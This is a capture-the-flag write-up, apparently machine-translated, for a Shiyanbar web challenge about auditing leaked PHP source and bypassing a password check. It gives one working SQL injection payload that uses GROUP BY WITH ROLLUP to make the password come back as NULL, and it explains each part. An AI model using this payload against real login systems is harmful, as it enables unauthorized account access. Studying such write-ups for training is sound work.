CTF---Web Primer The sixth question about the bypass of the lack of thought

The bypass score due to lack of thinking: 20

• Source: Pcat
• Difficulty: Medium
• Number of participants: 6479 people
• Get flag:2002 People
• Number of respondents: 2197 people
• Problem solving pass rate: 91%

Access to the problem-solving link to access the topic, you can answer questions. According to the general problem of web questions to solve the problem. Look at the source, request, response and so on. Submit content consistent with the title to return to flag. Then submit the correct flag to score. Web topics mainly examine SQL injection, XSS and other related knowledge. More direction involved. This topic mainly involves the source code audit, the MySQL related knowledge.

Flag Format ctf{}

Problem Solving Links: http://ctf5.shiyanbar.com/web/pcat/index.php

Original title Link: http://www.shiyanbar.com/ctf/1940

"Problem Solving Report"

　　This is the beginning of the web I started to write the sixth question, we point kaixie link, found that the page is very concise, we first first step or first look at the source of the page, but also very simple, a total of a row, but this line a little let me curious, More than a source.txt comment, perhaps this source.txt have a fishy, first think about it, this machine may not exist this file, we visit through the browser, the suffix is changed to source.txt access to try! Hey, really, the full source of the page is the original here!

Let's do an audit of this piece of code.

This part is interesting, meaning that the input values filter out these SQL injection statements, like all of them!

We look at this line, this line is also a SQL injection statement, which means to input uname as a condition, and then through the submission of uname to the database query uname and PWD, and then the query to the PWD and user input pwd to compare

If the user entered the PWD and the database query the same pwd, output ctf{xxxxxx}, otherwise output!

What we need to do is let the user enter the PWD and the database query the same PWD, so we change how to do?

We can use the following SQL injection statements:

' or 1=1 GROUP by PWD with rollup limit 1 offset 2 #

What does this phrase mean?

SELECT * from interest where uname= ' or 1=1
GROUP by PWD with rollup (add a row in the database to make Pwd=null)
Limit 1 (query only one row)
Offset 2 (query from second line)
#注释
The password can be queried successfully as long as it is empty

This is the key to the subject!

CTF---Web Primer The sixth question about the bypass of the lack of thought